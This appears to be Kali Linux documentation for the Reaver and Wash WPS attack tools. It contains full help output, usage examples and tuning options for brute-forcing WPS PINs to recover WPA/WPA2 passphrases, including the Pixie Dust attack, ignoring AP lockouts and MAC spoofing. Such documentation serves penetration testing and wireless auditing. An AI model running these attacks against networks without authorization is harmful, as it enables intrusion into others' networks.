Tool Documentation:
Scan for networks using the monitor mode interface ( -i wlan0mon ) on channel 6 ( -c 6 ), while ignoring frame checksum errors ( -C ):
[email protected]:~# wash -i wlan0mon -c 6 -C BSSID Ch dBm WPS Lck Vendor ESSID -------------------------------------------------------------------------------- E0:3F:49:6A:57:78 6 -73 1.0 No Unknown ASUS reaver Usage Example
Use the monitor mode interface ( -i mon0 ) to attack the access point ( -b E0:3F:49:6A:57:78 ), displaying verbose output ( -v ):
[email protected]:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [email protected]> [+] Waiting for beacon from E0:3F:49:6A:57:78 [+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS) [+] Trying pin 12345670 Packages and Binaries:
reaver
Reaver performs a brute force attack against an access point’s WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP’s wireless settings can be reconfigured.
Installed size: 1.62 MB
How to install: sudo apt install reaver
reaver
[email protected]:~# reaver -h Reaver v1.6.6 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [email protected]> Required Arguments: -i, --interface= Name of the monitor-mode interface to use -b, --bssid= BSSID of the target AP Optional Arguments: -m, --mac= MAC of the host system -e, --essid= ESSID of the target AP -c, --channel= Set the 802.11 channel for the interface (implies -f) -s, --session= Restore a previous session file -C, --exec= Execute the supplied command upon successful pin recovery -f, --fixed Disable channel hopping -5, --5ghz Use 5GHz 802.11 channels -v, --verbose Display non-critical warnings (-vv or -vvv for more) -q, --quiet Only display critical messages -h, --help Show help Advanced Options: -p, --pin= Use the specified pin (may be arbitrary string or 4/8 digit WPS pin) -d, --delay= Set the delay between pin attempts [1] -l, --lock-delay= Set the time to wait if the AP locks WPS pin attempts [60] -g, --max-attempts= Quit after num pin attempts -x, --fail-wait= Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay= Sleep for y seconds every x pin attempts -t, --timeout= Set the receive timeout period [10] -T, --m57-timeout= Set the M5/M7 timeout period [0.40] -A, --no-associate Do not associate with the AP (association must be done by another application) -N, --no-nacks Do not send NACK messages when out of order packets are received -S, --dh-small Use small DH keys to improve crack speed -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -J, --timeout-is-nack Treat timeout as NACK (DIR-300/320) -F, --ignore-fcs Ignore frame checksum errors -w, --win7 Mimic a Windows 7 registrar [False] -K, --pixie-dust Run pixiedust attack -Z Run pixiedust attack -O, --output-file= Write packets of interest into pcap file Example: reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv wash
[email protected]:~# wash -h Wash v1.6.6 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner Required Arguments: -i, --interface= Interface to capture packets on -f, --file [FILE1 FILE2 FILE3 . ] Read packets from capture files Optional Arguments: -c, --channel= Channel to listen on [auto] -n, --probes= Maximum number of probes to send to each AP in scan mode [15] -O, --output-file= Write packets of interest into pcap file -F, --ignore-fcs Ignore frame checksum errors -2, --2ghz Use 2.4GHz 802.11 channels -5, --5ghz Use 5GHz 802.11 channels -s, --scan Use scan mode -u, --survey Use survey mode [default] -a, --all Show all APs, even those without WPS -j, --json print extended WPS info as json -U, --utf8 Show UTF8 ESSID (does not sanitize ESSID, dangerous) -p, --progress Show percentage of crack progress -h, --help Show help Example: wash -i wlan0mon Reaver (reaver-wps-fork-t6x)
Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a wide variety of access points and WPS implementations.
The original Reaver implements a online brute force attack against, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf. reaver-wps-fork-t6x is a community forked version, which has included various bug fixes and additional attack method (the offline Pixie Dust attack).
Depending on the target’s Access Point (AP), to recover the plain text WPA/WPA2 passphrase the average amount of time for the transitional online brute force method is between 4-10 hours. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. When using the offline attack, if the AP is vulnerable, it may take only a matter of seconds to minutes.
Author: Tactical Network Solutions, Craig Heffner, t6_x, DataHead, Soxrok2212
Reaver Help
Required Arguments: -i, --interface= Name of the monitor-mode interface to use -b, --bssid= BSSID of the target AP Optional Arguments: -m, --mac= MAC of the host system -e, --essid= ESSID of the target AP -c, --channel= Set the 802.11 channel for the interface (implies -f) -o, --out-file= Send output to a log file [stdout] -s, --session= Restore a previous session file -C, --exec= Execute the supplied command upon successful pin recovery -D, --daemonize Daemonize reaver -f, --fixed Disable channel hopping -5, --5ghz Use 5GHz 802.11 channels -v, --verbose Display non-critical warnings (-vv or -vvv for more) -q, --quiet Only display critical messages -h, --help Show help Advanced Options: -p, --pin= Use the specified pin (may be arbitrary string or 4/8 digit WPS pin) -d, --delay= Set the delay between pin attempts [1] -l, --lock-delay= Set the time to wait if the AP locks WPS pin attempts [60] -g, --max-attempts= Quit after num pin attempts -x, --fail-wait= Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay= Sleep for y seconds every x pin attempts -t, --timeout= Set the receive timeout period [10] -T, --m57-timeout= Set the M5/M7 timeout period [0.40] -A, --no-associate Do not associate with the AP (association must be done by another application) -N, --no-nacks Do not send NACK messages when out of order packets are received -S, --dh-small Use small DH keys to improve crack speed -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -n, --nack Target AP always sends a NACK [Auto] -w, --win7 Mimic a Windows 7 registrar [False] -K, --pixie-dust Run pixiedust attack -Z
-K or -Z // —pixie-dust
The -K and -Z option perform the offline attack, Pixie Dust (pixiewps), by automatically passing the PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey variables. pixiewps will then try to attack Ralink, Broadcom and Realtek detected chipset.Special note: If you are attacking a Realtek AP, do NOT use small DH Keys (-S) option. User will have to execute reaver with the cracked PIN (option -p) to get the WPA pass-phrase. This is a temporary solution and an option to do a full attack will be implemented soon
-p with arbitrary string // —pin=
It can be used against Access Points that do not follow the WPS checksum on the last digit of the PIN.
Reaver Options
Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP:
reaver -i wlan0 -b 00:01:02:03:04:05
It is suggested that you run Reaver in verbose mode in order to get more detailed information about the attack as it progresses:
reaver -i wlan0 -b 00:01:02:03:04:05 -vv
The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically identified by Reaver, unless explicitly specified on the command line:
reaver -i wlan0 -b 00:01:02:03:04:05 -c 11 -e linksys
Since version 1.3, Reaver implements the small DH key optimization as suggested by Stefan which can speed up the attack speed:
reaver -i wlan0 -b 00:01:02:03:04:05 --dh-small
By default, if the AP switches channels, Reaver will also change its channel accordingly. However, this feature may be disabled by fixing the interface’s channel:
reaver -i wlan0 -b 00:01:02:03:04:05 --fixed
When spoofing your MAC address, you must set the desired address to spoof using the ifconfig utility, and additionally tell Reaver what the spoofed address is:
reaver -i wlan0 -b 00:01:02:03:04:05 --mac=AA:BB:CC:DD:EE:FF
The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
reaver -i wlan0 -b 00:01:02:03:04:05 -t 2
The default delay period between pin attempts is 1 second. This value can be increased or decreased to any non-negative integer value. A value of zero means no delay:
reaver -i wlan0 -b 00:01:02:03:04:05 -d 0
Some APs will temporarily lock their WPS state, typically for five minutes or less, when «suspicious» activity is detected. By default when a locked state is detected, Reaver will check the state every 315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked.
This check can be increased or decreased to any non-negative integer value:
reaver -i wlan0 -b 00:01:02:03:04:05 --lock-delay=250
The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This timeout period can be set manually if necessary (max timeout period is 1 second):
reaver -i wlan0 -b 00:01:02:03:04:05 -T .5
Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated the same as a NACK by default. However, if it is known that the target AP sends NACKS (most do), this feature can be disabled to ensure better reliability. This option is largely useless as Reaver will auto-detect if an AP properly responds with NACKs or not:
reaver -i wlan0 -b 00:01:02:03:04:05 --nack
While most APs don’t care, sending an EAP FAIL message to close out a WPS session is sometimes necessary.
By default this feature is disabled, but can be enabled for those APs that need it:
When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in place that will occur whenever these warning messages appear:
reaver -i wlan0 -b 00:01:02:03:04:05 --fail-wait=360
Reaver Usage Example
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vvv -K 1
How to install Reaver
The program is pre-installed on Kali Linux.
Installation on Linux (Debian, Mint, Ubuntu)
sudo apt-get -y install build-essential libpcap-dev aircrack-ng git clone https://github.com/t6x/reaver-wps-fork-t6x cd reaver-wps-fork-t6x*/ cd src/ ./configure make sudo make install
Reaver Screenshots
